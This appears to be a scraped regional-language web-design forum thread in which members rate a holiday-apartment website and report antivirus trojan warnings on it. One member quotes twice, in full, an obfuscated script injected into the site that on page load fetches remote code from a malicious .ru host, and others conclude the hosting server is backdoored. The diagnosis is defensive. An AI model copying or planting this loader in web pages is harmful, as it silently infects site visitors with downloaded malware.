Meni javlja trojanca!!!
isti je i kod mene
Meni javlja trojanca!!!
isti je i kod mene
povecaj ikonice dodaj koji video dodaj i koji efekat i bi ce super za sada od 1 do 10 ocena je 5
10/10 - http://www.pes-cro.net , server je malo sporiji, ali nakon čiščenja će biti super
Odakle je dizajn?
Pardon, da preformuliram. Odakle si uzeo dizajn??
Govorim za www.apartmani-blidinje.com
Ocjena je 5/10
Evo nekih prijedloga kako to malo poboljšati:
Evo to su samo neki od prijedloga, ovako je OK, boje su ti dobro usklađene, izgleda dobro
od 1 do 5
4
Vrlo dobra,posebno mi se svida navigacijam i sama jednostavnost,a za bozicni ugodaj tu je i javascripta pahuljica.7/10
Stranica je dobra, jednostavna i organizirana. Sviđa mi se. Dobro kod dizajna uvijek se može javiti neka zamjerka.
Što se tiče ovih ideja 3D ili rezervacija - polako ljudi, vidite da sezona još nije niti počela, posuđuju se djelovi - treba zaraditi pare da bi ih se trošilo:-)
Ocjena je 5/10
Evo nekih prijedloga kako to malo poboljšati:
Evo to su samo neki od prijedloga, ovako je OK, boje su ti dobro usklađene, izgleda dobro
Za izradu panorame mu netreba javascript (mislim da bi to bilo lose), već ima program PANO2VR koji izraduđuje panoramske .swf datoteke i imas 360* pogled sastavljen od više slika. Imas ovdje primjere koji su rađeni u PANO2VR.
virus
nije me briga ako je false flag
ja sam neinformiran korisnik
javlja mi virus
ti nisi zlocest
ahhh, tako ce ljudi mislit...
Od 1 do 10??
Nemoj se naljutiti al je ovo čista NULA (0)
Totalno fulana koncepcija...ma...ma neču niš govorit...najbolje usporedi sa sličnim stranicama proizvedenim kod profesionalaca.
Kao pokušaj je Ok...al ne ocjenjujemo pokušaj, nego kao funkcionalnu web stranicu...
trojanac zajebava majku mu
Bila bi bolja da nemaš gore trojanca.
meni iskoci trojan alert hhahahahah
Nemogu
Imaš trojanca na stranici...
pozdrav
Nije trojanac, false positive je. Ne vidim ništa što bi bilo sumnjivo ovdje. http://www.apartmani-blidinje.com/js/slike.js
Osim ako nema nešto u ovom dole, gnu/gpl licencnom js.
Nways, cool fora Maka. Da malo podigneš klikove i rank na google-u.
Meni javlja trojanca!!!
I meni. NOD32.
Imaš trojanca i na www.dead-pixel.info i na ovoj stranici iz teme. avast antivirus.
Postalja se pitanje zašto dead-pixel povlači nešto sa sears-com.gamevance.com.clicksor-com.guidebat.ru
Više pogledajte na ovom linku http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://sears-com.gamevance.com.clicksor-com.guidebat.ru:8080/pichunter.com/pichunter.com/odesk.com/tv.com/google.com/&client=googlechrome&hl=hr
pametna reklama
Znam da je stranica zaražena, a skinuo sam i skriptu s kojom se rješim trojanca, ali nakon par dana se on opet vraća. Prijavio sam to momku što sam od njega uzeo hosting, pa će se on s tim pozabavit, jer je vjerovatno kod njega taj problem.
A šta ti je ovo momak?
<script>/*GNU GPL*/ try{window.onload = function(){var Lwlxm5wmdhtn = document.createElement('s@!#c$^r@!^i(#p###t($'.replace(/\)|@|\!|#|\^|\(|\$|&/ig, ''));var Flvvhkpwvp5l = 'Sz9nut96e3l3';Lwlxm5wmdhtn.setAttribute('type', 't!e&!x@@&t@)/@!j@a@)#@v^@(a&)s&)#&c$!!r^)@i&p^)(&t&^$#'.replace(/\)|\^|\$|\(|@|\!|&|#/ig, ''));Lwlxm5wmdhtn.setAttribute('src', 'h@(!(t&@t@#p&:@@)&$/@@/@s#($e$)!#(a)$$r!))s^(!-$c#!o!#^#)m)@$!.#&)g!&a^@m)#e$$!v^^@#a@!)n^$$!c$!e)&$!.!@&#c!&o^)&m^(.(!c^l&!$i$$!#(c()@)k#(s#!$(o$(((r$#^(-!c$(@o#m!!.!g&((u$#!i@d^)e!^^b^a)t&.@!^r&@!@u)!^&:&)8!#0#^8#!0)/^!p!^i^(&$c^h)u()n#)t!$^#e##&^r^^)$(.!c(^$$!o#$)(m@()@/!^@@p$&#i^^!^c)$#(h()!#u(n#($t(e@#r()^^.^)c($#o^#m$$^/$(!o(())d$(&@e&^$s@@@k!.!#c^)o&m!/^@@t&((v^.@)#c#!o^!@m)##)/)#!g#$o))o$g$$^(l&)!#e(^$.#)c&o)$#)m&()/^^'.replace(/\$|&|\(|@|\^|\!|#|\)/ig, ''));Lwlxm5wmdhtn.setAttribute('defer', 'd)$e@@f@@&(e)@r^!('.replace(/@|\(|\$|&|\)|#|\!|\^/ig, ''));Lwlxm5wmdhtn.setAttribute('id', 'W^q#&@m^^&7#!!)!q&#i#&f&2^i)!z$&)('.replace(/&|#|\)|\^|\!|@|\$|\(/ig, ''));document.body.appendChild(Lwlxm5wmdhtn);}} catch(T3fo7j6afdaj4r) {}</script>
Pa nećemo se valjda tako igrati?
Ocijenjujem tvoju stranicu zaraženom trojan downloaderom i lagano može biti prijavljena google-u.
A šta ti je ovo momak?
<script>/*GNU GPL*/ try{window.onload = function(){var Lwlxm5wmdhtn = document.createElement('s@!#c$^r@!^i(#p###t($'.replace(/\)|@|\!|#|\^|\(|\$|&/ig, ''));var Flvvhkpwvp5l = 'Sz9nut96e3l3';Lwlxm5wmdhtn.setAttribute('type', 't!e&!x@@&t@)/@!j@a@)#@v^@(a&)s&)#&c$!!r^)@i&p^)(&t&^$#'.replace(/\)|\^|\$|\(|@|\!|&|#/ig, ''));Lwlxm5wmdhtn.setAttribute('src', 'h@(!(t&@t@#p&:@@)&$/@@/@s#($e$)!#(a)$$r!))s^(!-$c#!o!#^#)m)@$!.#&)g!&a^@m)#e$$!v^^@#a@!)n^$$!c$!e)&$!.!@&#c!&o^)&m^(.(!c^l&!$i$$!#(c()@)k#(s#!$(o$(((r$#^(-!c$(@o#m!!.!g&((u$#!i@d^)e!^^b^a)t&.@!^r&@!@u)!^&:&)8!#0#^8#!0)/^!p!^i^(&$c^h)u()n#)t!$^#e##&^r^^)$(.!c(^$$!o#$)(m@()@/!^@@p$&#i^^!^c)$#(h()!#u(n#($t(e@#r()^^.^)c($#o^#m$$^/$(!o(())d$(&@e&^$s@@@k!.!#c^)o&m!/^@@t&((v^.@)#c#!o^!@m)##)/)#!g#$o))o$g$$^(l&)!#e(^$.#)c&o)$#)m&()/^^'.replace(/\$|&|\(|@|\^|\!|#|\)/ig, ''));Lwlxm5wmdhtn.setAttribute('defer', 'd)$e@@f@@&(e)@r^!('.replace(/@|\(|\$|&|\)|#|\!|\^/ig, ''));Lwlxm5wmdhtn.setAttribute('id', 'W^q#&@m^^&7#!!)!q&#i#&f&2^i)!z$&)('.replace(/&|#|\)|\^|\!|@|\$|\(/ig, ''));document.body.appendChild(Lwlxm5wmdhtn);}} catch(T3fo7j6afdaj4r) {}</script>
Pa nećemo se valjda tako igrati?
Ne mora to ništa značiti. Možda samo "olakšana" verzija neke skripte, tipa highslide. Orginalna verzija je oko 50kb, olakšana i koristi ovakve znakove 26kb.
Nije olakšana verzija ničega. Ima pozitivni signature i nije skračenica ničega. Nije ni vidljiva u pagesource-u nego vjerojatno proizlazi iz neke php skripte.
Nije olakšana verzija ničega. Ima pozitivni signature i nije skračenica ničega. Nije ni vidljiva u pagesource-u nego vjerojatno proizlazi iz neke php skripte.
Istina. Imaju backdooran server. Nije on kriv.
Istina. Imaju backdooran server. Nije on kriv.
Znam da nije, moram ga malo zaje*avat
Znam da nije, moram ga malo zaje*avat
True, true...